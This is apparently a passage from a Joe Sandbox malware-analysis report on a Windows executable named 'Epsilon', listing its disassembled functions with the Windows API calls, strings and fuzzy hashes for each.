                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                • String ID:
                                                                                • API String ID: 1214682469-0
                                                                                • Opcode ID: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                                • Instruction ID: c14c59d8eba987f8b9ad2940cf4d46d693a4375744742d4ba67726bb5dad94f9
                                                                                • Opcode Fuzzy Hash: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                                • Instruction Fuzzy Hash: A5116F31A0CB4692EA109B12E4042A9FA60FB59FE6F884634DF5D07B94DF3CD4528B10
                                                                                Function 00007FF737825690 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF737823B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF737823A09), ref: 00007FF737823B64
                                                                                  • Part of subcall function 00007FF737823B40: PeekMessageA.USER32 ref: 00007FF737823B89
                                                                                  • Part of subcall function 00007FF737823B40: PeekMessageA.USER32 ref: 00007FF737823BCD
                                                                                • WriteFile.KERNELBASE ref: 00007FF7378256E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                • String ID:
                                                                                • API String ID: 1084409-0
                                                                                • Opcode ID: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                                                • Instruction ID: c9c79f3929cf86c3e227409290e56f26679cd00b52d9a43148d67c7231512950
                                                                                • Opcode Fuzzy Hash: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                                                • Instruction Fuzzy Hash: 0621A120A0C54AD6E710AF15E8447B5FFA0FF84B9AF948235D96D066E4CF3CE426DB20
                                                                                Function 00007FF7378251BC Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                                • String ID:
                                                                                • API String ID: 2018477427-0
                                                                                • Opcode ID: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                                                • Instruction ID: 3398d0d95ffb900368933ecbe3b5e1b259efe26e1aeeae9cb90446bde2484f67
                                                                                • Opcode Fuzzy Hash: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                                                • Instruction Fuzzy Hash: 2E11CA3194C64AA2F7506B10E5843F4BEA0FB4531AFA84270C95C426E0CF7EE4A7A320
                                                                                Function 00007FF737827BA8 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: CharPrev
                                                                                • String ID:
                                                                                • API String ID: 122130370-0
                                                                                • Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                                • Instruction ID: 4952255f4e5df411a91ee20ba5029d6d1f43c805a3b757d52dd99c9aac46e612
                                                                                • Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                                • Instruction Fuzzy Hash: 3C014921A0C7C996F7016F22A8403ADFEA0A701BF1FE89234DB69077D5CB2CD4639710
                                                                                Function 00007FF737825770 Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                                • Instruction ID: f379e625c779e22932a122c8355b1df6801ed3f8e387a02571ca750bfc31a5b6
                                                                                • Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                                • Instruction Fuzzy Hash: 09F0F63164C785E6DB1C6F24F5800B8BA60EB08B5AF404235DE2B476C4CF38C092C720

                                                                                Non-executed Functions

                                                                                Function 00007FF737823530 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 174windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                                • String ID: $Adv$C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                • API String ID: 3530494346-2342008264
                                                                                • Opcode ID: 02408ae6c79d5afd0dbd1d350f378b5c084b7eca4ab1b8cbcc717c39842157fc
                                                                                • Instruction ID: 891534d345e1cdf0430a902377d2143b202ca8433881f08abe72668bc2478be3
                                                                                • Opcode Fuzzy Hash: 02408ae6c79d5afd0dbd1d350f378b5c084b7eca4ab1b8cbcc717c39842157fc
                                                                                • Instruction Fuzzy Hash: AE71BB61A0C64AAAFB50BB1195143F9EE91FB89B86FD44130CA4E46BD4CF3CD517A720
                                                                                Function 00007FF7378211CC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68librarymemoryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                • API String ID: 4204503880-1888249752
                                                                                • Opcode ID: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                                                • Instruction ID: 0694546b3f061c2b1c7a9eecba8d7a6f32ca8004c0aaf2ab0c71f1498e3be878
                                                                                • Opcode Fuzzy Hash: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                                                • Instruction Fuzzy Hash: 0C312936A0CB499AE6109F16F4441AAFFA0FB89B81F855139EE8E43714DF3CE016DB10
                                                                                Function 00007FF737821C0C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64shutdownCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                                • String ID: SeShutdownPrivilege
                                                                                • API String ID: 2829607268-3733053543
                                                                                • Opcode ID: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                                • Instruction ID: 9fe4cf3e212a2f81c69b52976a78671083df2f5f59c1ec633e8c6bfbd9810b7b
                                                                                • Opcode Fuzzy Hash: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                                • Instruction Fuzzy Hash: 62219172A1CA46D7F750AB20E0597BAFFA0FB89746F909135DA4E02A54CF3CD056DB10
                                                                                Function 00007FF737828964 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 4104442557-0
                                                                                • Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                                • Instruction ID: d38b0647bff5b601b7e60659f845e5774b5b3dc02cf5daf50eb8ec306486ebbc
                                                                                • Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                                • Instruction Fuzzy Hash: F7115C22A08B499AEB00EF61E8442A877E4FB09759F800A30EA6D47754DF7CE1B69350
                                                                                Function 00007FF737828790 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                                                • Instruction ID: c63de38df50dabdb3febceca18728c8efd2d96de78b579970c643216d41c3165
                                                                                • Opcode Fuzzy Hash: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                                                • Instruction Fuzzy Hash: 86B09210E29406E1DA04BB219C850A057A0BB58306FD00830C00D80120DE1CA1ABA710
                                                                                Function 00007FF7378270A8 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                • String ID: "$:$@$RegServer
                                                                                • API String ID: 1203814774-4077547207
                                                                                • Opcode ID: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                                • Instruction ID: fd7b086e7acdd973c919e42ee0110f147552b8321f96f9b37456afd4c83effdc
                                                                                • Opcode Fuzzy Hash: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                                • Instruction Fuzzy Hash: DE02F361A0C68A61FB64AB2654142F9EFB1EF42746FD80139CB5E066D4CE3DE423E730
                                                                                Function 00007FF737824A60 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 123libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824A86
                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824AAA
                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824ACA
                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824AEC
                                                                                • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824B1B
                                                                                • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824B3A
                                                                                • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824B54
                                                                                • FreeLibrary.KERNEL32 ref: 00007FF737824BF1
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824C0D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                • API String ID: 1865808269-1731843650
                                                                                • Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                                • Instruction ID: 082ad6121fff178517d534747b091db266be9f498aea73cb1061189050af8273
                                                                                • Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                                • Instruction Fuzzy Hash: C8517125A0DB8AA6E740AB11B8101B9FF90FB89B92FC44535DE4E03794DF3CD456E720
                                                                                Function 00007FF737824DCC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 159memorywindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                                • String ID: Adv$rce.
                                                                                • API String ID: 2929476258-1496161719
                                                                                • Opcode ID: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                                • Instruction ID: 7e353c84e6e1ace299c242ad6c12fab2a9e936fdf39df127348a91ef954b222a
                                                                                • Opcode Fuzzy Hash: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                                • Instruction Fuzzy Hash: FF61C121E0C789A6FB11AB21A8003F9EE90AF59B66F845230DE4D53391DF3CE953D720
                                                                                Function 00007FF73782261C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 129registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                • API String ID: 2659952014-2428544900
                                                                                • Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                                • Instruction ID: 43699ab7c4641c1ce2e569b31d390a44fbfbf1a4a1921f7c2eecb0b35fdac2f8
                                                                                • Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                                • Instruction Fuzzy Hash: C851827260C689A6EB10AF11E8542FABFA0FB8AB92FD55031DA4E03794DF3CD456D710
                                                                                Function 00007FF7378233F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                • String ID: Adv
                                                                                • API String ID: 3785188418-921584719
                                                                                • Opcode ID: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
                                                                                • Instruction ID: d1e1e005cb716328b2c3e2067a28500b1f8a82ae24270875017aec5d22fe5fd6
                                                                                • Opcode Fuzzy Hash: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
                                                                                • Instruction Fuzzy Hash: A8314131E0C64A96E6106B24E8142F4FFA1FB8EB52FD49270C91E52794CF3CA067E720
                                                                                Function 00007FF7378212EC Relevance: 16.6, APIs: 11, Instructions: 125memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                • String ID:
                                                                                • API String ID: 2168512254-0
                                                                                • Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                                • Instruction ID: e34e303f576afb4efee1bba62db2be3fee51b96e6518a45865f41535e1c318da
                                                                                • Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                                • Instruction Fuzzy Hash: 94517032A08A45DAE720AF21E4501F9BFA4FB4DB89F925135DA0E53754DF38E426DB10
                                                                                Function 00007FF737827F04 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                                                • API String ID: 3346862599-1109908249
                                                                                • Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                                • Instruction ID: 8e7379a32292f0ff9aed61b99defaebe7aa125ec0b97537aad9cbb1532ff11bb
                                                                                • Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                                • Instruction Fuzzy Hash: E151A332A0CA89AAEB109B64D4401FDFBE0FB88B52F854532DA5D13794DF3CE556EB10
                                                                                Function 00007FF737822834 Relevance: 12.2, APIs: 8, Instructions: 153memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                • String ID:
                                                                                • API String ID: 1051330783-0
                                                                                • Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                • Instruction ID: ce1dbcfc39096496239755b1570651013e2c61edb86705e934ebccfa430fd4a6
                                                                                • Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                • Instruction Fuzzy Hash: 94518532A0C64AAAEB509F1594006F8BFA4FB48B96F955131DE0D63794DF3CE463D720
                                                                                Function 00007FF737822A6C Relevance: 12.1, APIs: 8, Instructions: 126COMMON
                                                                                Download Yara Rule
                                                                                APIs
